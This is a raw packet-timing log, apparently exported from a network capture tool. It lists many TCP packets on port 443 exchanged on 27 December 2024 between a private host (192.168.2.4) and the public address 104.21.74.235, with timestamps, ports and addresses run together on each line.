                                                                                            Dec 27, 2024 10:12:15.239382029 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.239425898 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.245141029 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.245162010 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.245225906 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.245239973 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.245284081 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.250416994 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.250437975 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.250504017 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.250514030 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.250554085 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.256405115 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.256426096 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.256480932 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.256493092 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.256531954 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.262304068 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.262329102 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.262366056 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.262375116 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.262397051 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.262409925 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.389874935 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.389904022 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.389951944 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.389961004 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.389990091 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.390012026 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.394633055 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.394656897 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.394721985 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.394731045 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.394768953 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.400655031 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.400679111 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.400734901 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.400747061 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.400759935 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.400784969 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.440754890 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.440777063 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.440853119 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.440862894 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.440902948 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.446585894 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.446607113 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.446670055 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.446677923 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.446717024 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.452610970 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.452635050 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.452697039 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.452708960 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.452724934 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.452749014 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.457882881 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.457904100 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.457989931 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.458010912 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.458086967 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.463787079 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.463807106 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.463886023 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.463901043 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.463942051 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.591048956 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.591074944 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.591181040 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.591197968 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.591243982 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.596347094 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.596369982 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.596447945 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.596457005 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.596493006 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.602826118 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.602849960 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.602921963 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.602931976 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.602946997 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.602972031 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.642819881 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.642847061 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.642920017 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.642929077 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.642971992 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.649264097 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.649283886 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.649357080 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.649367094 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.649408102 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.654803991 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.654829979 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.654867887 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.654881001 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.654903889 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.654920101 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.659297943 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.659333944 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.659354925 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.659363985 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.659384012 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.659404039 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.665229082 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.665251017 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.665333033 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.665344000 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.665388107 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.792392015 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.792416096 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.792483091 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.792496920 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.792516947 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.792532921 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.797962904 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.797985077 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.798031092 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.798038960 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.798052073 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.798074007 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.803287983 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.803309917 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.803375006 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.803381920 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.803407907 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.803416014 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.843417883 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.843440056 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.843524933 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.843553066 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.843592882 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.849283934 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.849304914 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.849351883 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.849360943 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.849381924 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.849395990 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.855318069 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.855341911 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.855381012 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.855390072 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.855405092 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.855432034 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.860564947 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.860594034 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.860635042 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.860642910 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.860670090 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.860685110 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.866584063 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.866611958 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.866652012 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.866658926 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.866672993 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.866693974 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.993707895 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.993735075 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.993782043 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.993789911 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.993820906 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.993840933 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.999330044 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.999361038 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.999411106 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.999418974 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:15.999452114 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:15.999461889 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.004535913 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.004560947 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.004594088 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.004611015 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.004630089 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.004646063 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.045017004 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.045043945 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.045073986 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.045084953 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.045106888 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.045128107 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.050929070 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.050956964 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.050990105 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.050997972 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.051018953 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.051043987 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.056854010 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.056884050 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.056910038 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.056917906 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.056943893 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.056963921 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.062098980 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.062120914 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.062159061 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.062170982 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.062237978 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.062256098 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.068150043 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.068176985 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.068224907 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.068236113 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.068268061 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.068281889 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.195182085 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.195209980 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.195260048 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.195269108 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.195302010 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.195319891 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.200527906 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.200550079 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.200604916 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.200613022 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.200639009 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.200649023 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.205841064 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.205862999 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.205904961 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.205910921 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.205936909 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.205949068 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.246958017 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.246980906 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.247042894 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.247052908 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.247092009 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.252892017 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.252916098 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.252971888 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.252985954 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.253009081 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.253022909 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.258196115 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.258217096 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.258301973 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.258325100 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.258363008 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.264077902 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.264101982 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.264159918 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.264174938 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.264199972 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.264214039 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.270092010 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.270113945 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.270190954 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.270203114 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.270246029 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.396615028 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.396639109 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.396701097 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.396709919 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.396747112 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.402062893 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.402085066 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.402152061 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.402160883 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.402198076 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.408118963 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.408140898 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.408199072 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.408215046 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.408250093 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.448510885 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.448532104 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.448635101 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.448647976 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.448688984 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.454317093 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.454338074 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.454385996 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.454392910 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.454411030 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.454427958 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.459554911 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.459578037 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.459635019 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.459645987 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.459667921 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.459686995 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.465594053 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.465615034 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.465681076 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.465693951 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.465727091 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.471496105 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.471518040 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.471586943 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.471601009 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.471637964 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.598076105 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.598102093 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.598165989 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.598184109 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.598212957 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.598233938 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.603470087 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.603493929 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.603534937 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.603552103 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.603564024 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.603593111 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.609467983 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.609504938 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.609539986 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.609554052 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.609568119 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.609587908 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.649925947 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.649949074 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.649983883 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.649991989 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.650019884 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.650029898 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.655179977 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.655206919 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.655239105 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.655249119 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.655280113 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.655297995 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.661201954 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.661228895 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.661259890 CET49763443192.168.2.4104.21.74.235
                                                                                            Dec 27, 2024 10:12:16.661274910 CET44349763104.21.74.235192.168.2.4
                                                                                            Dec 27, 2024 10:12:16.661288023 CET49763443192.168.2.4104.21.74.235
